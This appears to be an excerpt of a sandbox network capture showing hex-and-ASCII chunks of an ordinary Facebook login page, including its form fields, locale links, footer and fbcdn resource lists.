                                                                                    Data Ascii: LxhTCSrt3HtIu9SYGcmiz_S5SpHII5jmOLdqAXq7540Wo8q"]},-1],["cr:1984081",[],{"__rc":[null,"Aa1CClGFWxpH-NDU32auGYTx-Nos3XFYxSLKuOagxyGlBc3YkUAM59-rd8wQLxBnzQ17OsCLByAIxUdpxvOdJBIm3JnV"]},-1]],"require":[["markJSEnabled"],["lowerDomain"],["URLFragmentPrelude"]
                                                                                    2023-02-07 18:45:36 UTC222INData Raw: 6e 74 69 6e 75 65 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 32 20 5f 31 77 31 74 20 5f 34 2d 75 38 20 5f 35 32 6a 76 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 75 22 20 69 64 3d 22 68 65 61 64 65 72 5f 62 6c 6f 63 6b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 39 37 77 31 20 5f 35 30 66 36 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 61 78 7a 22 3e 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 2f 64 65 76 69 63
                                                                                    Data Ascii: ntinue.</div></div></div><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Log Into Facebook</div></span></div><div class="login_form_container"><form id="login_form" action="/login/devic
                                                                                    2023-02-07 18:45:36 UTC223INData Raw: 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 20 69 64 3d 22 65 6d 61 69 6c 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 20 69 6e 70 75 74 74 65 78 74 20 5f 31 6b 62 74 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 31 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 72 69
                                                                                    Data Ascii: /><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email or phone number" value="" autofocus="1" autocomplete="username" ari
                                                                                    2023-02-07 18:45:36 UTC224INData Raw: 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70 65 22 20 6e 61 6d 65 3d 22 66 69 72 73 74 5f 70 72 65 66 69 6c 6c 5f 74 79 70
                                                                                    Data Ascii: ype="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_typ
                                                                                    2023-02-07 18:45:36 UTC226INData Raw: 61 73 73 3d 22 75 69 4c 69 73 74 20 6c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 4c 69 73 74 20 5f 32 70 69 64 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75
                                                                                    Data Ascii: ass="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccou
                                                                                    2023-02-07 18:45:36 UTC227INData Raw: 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25
                                                                                    Data Ascii: ook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%
                                                                                    2023-02-07 18:45:36 UTC229INData Raw: 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63
                                                                                    Data Ascii: /\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espaol</a></li><li><a c
                                                                                    2023-02-07 18:45:36 UTC230INData Raw: 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 38 29 3b 20
                                                                                    Data Ascii: cale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8);
                                                                                    2023-02-07 18:45:36 UTC232INData Raw: 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 61 74 63 68 2f 22 20 74
                                                                                    Data Ascii: in/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" t
                                                                                    2023-02-07 18:45:36 UTC233INData Raw: 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 77 65 20 63 6f 6c 6c 65 63 74 2c 20 75 73 65 20 61 6e 64 20 73 68 61 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 73 75 70 70 6f 72 74
                                                                                    Data Ascii: tinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support
                                                                                    2023-02-07 18:45:36 UTC235INData Raw: 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26
                                                                                    Data Ascii: " title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &
                                                                                    2023-02-07 18:45:36 UTC236INData Raw: 68 61 73 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 55 43 73 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 57 35 77 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 68 55 51 22 7d 2c 22 31 37 32 32 30 31 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 5f 4d 35 67 70 63 36 52 4c 72 48 6a 63 31 45 4d 22 7d 2c 22 31 37 37 38 33 30 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 35 66 69 73 5a 68 6d 63 32 58 39 32 45 68 37 6b 22 7d 2c 22 31 38
                                                                                    Data Ascii: hash":"AT6guCW1eyIkOV1EUCs"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXVW5w"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBUhUQ"},"1722014":{"result":false,"hash":"AT6_M5gpc6RLrHjc1EM"},"1778302":{"result":false,"hash":"AT65fisZhmc2X92Eh7k"},"18
                                                                                    2023-02-07 18:45:36 UTC238INData Raw: 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 35 70 39 4a 67 64 39 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 37 78 30 77 78 65 62 53 4e 78 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 42 6e 62 61 6a 53 37 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 2d 5c 2f 72 5c 2f 71 75 39 76 69 2d 62 6d 57 6c 33 2e 6a 73 3f 5f 6e 63 5f 78
                                                                                    Data Ascii: s?_nc_x=Ij3Wp8lg5Kz","nc":1},"5p9Jgd9":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/7x0wxebSNxQ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"BnbajS7":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/r\/qu9vi-bmWl3.js?_nc_x
                                                                                    2023-02-07 18:45:36 UTC239INData Raw: 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6d 5c 2f 72 5c 2f 35 37 4a 6f 4f 68 5a 67 36 50 35 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 41 6a 72 70 33 6e 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 35 48 37 38 43 34 79 2d 50 70 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 76 32 52 71 37 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70
                                                                                    Data Ascii: /rsrc.php\/v3\/ym\/r\/57JoOhZg6P5.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ajrp3n3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/5H78C4y-PpG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Yv2Rq7N":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.p
                                                                                    2023-02-07 18:45:36 UTC241INData Raw: 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 35 78 53 34 5c 2f 79 68 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 45 68 34 79 71 68 69 50 32 36 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 74 76 37 71 44 2b 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 34 58 62 4b 31 48 50 31 47 4c 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 39 5a 69 72 31 75 38 22 3a 7b 22 74 79 70 65 22 3a
                                                                                    Data Ascii: "src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i5xS4\/yh\/l\/en_US\/Eh4yqhiP26l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Mtv7qD+":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/4XbK1HP1GLb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"9Zir1u8":{"type":
                                                                                    2023-02-07 18:45:36 UTC242INData Raw: 33 66 49 6e 56 52 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 36 4b 79 45 63 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 32 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6d 34 73 45 6b 4e 7a 31 39 35 4d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 34 79 4a 57 6b 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 32 5c 2f 72 5c 2f
                                                                                    Data Ascii: 3fInVR.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"O6KyEcj":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/l\/0,cross\/m4sEkNz195M.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"64yJWkL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/r\/
                                                                                    2023-02-07 18:45:36 UTC244INData Raw: 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6a 5c 2f 72 5c 2f 6a 55 6c 4f 37 73 46 2d 5f 76 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 32 55 49 31 77 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 7a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 7a 52 44 73 5f 61 56 57 47 67 68 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 30 51 72 44 74 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e
                                                                                    Data Ascii: bcdn.net\/rsrc.php\/v3\/yj\/r\/jUlO7sF-_vn.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"d2UI1wq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/l\/0,cross\/zRDs_aVWGgh.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"Y0QrDtL":{"type":"js","src":"https:\/\/static.
                                                                                    2023-02-07 18:45:36 UTC245INData Raw: 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6e 4e 78 6a 46 2b 4e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 75 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 45 58 4c 42 73 69 30 37 5a 32 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 55 77 6c 31 72 2b 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 72 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 67 51 48 38 43 68 6d 35 50
                                                                                    Data Ascii: Wp8lg5Kz","nc":1},"nNxjF+N":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yu\/l\/en_US\/EXLBsi07Z2u.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Uwl1r+A":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yr\/l\/0,cross\/gQH8Chm5P
                                                                                    2023-02-07 18:45:36 UTC246INData Raw: 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 74 56 73 68 70 31 4f 49 56 39 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 33 7a 68 73 44 6d 55 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74
                                                                                    Data Ascii: :\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/tVshp1OIV9l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"3zhsDmU":{"type":"js","src":"https:\/\/st
                                                                                    2023-02-07 18:45:36 UTC248INData Raw: 63 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 4b 6b 38 31 6d 31 59 22 2c 22 42 6e 62 61 6a 53 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 2c 22 73 78 54 6d 6c 4c 4f 22 2c 22 35 70 39 4a 67 64 39 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 66 6f 7a 37 6e 77 37 22 2c 22 63 36 6b 70 52 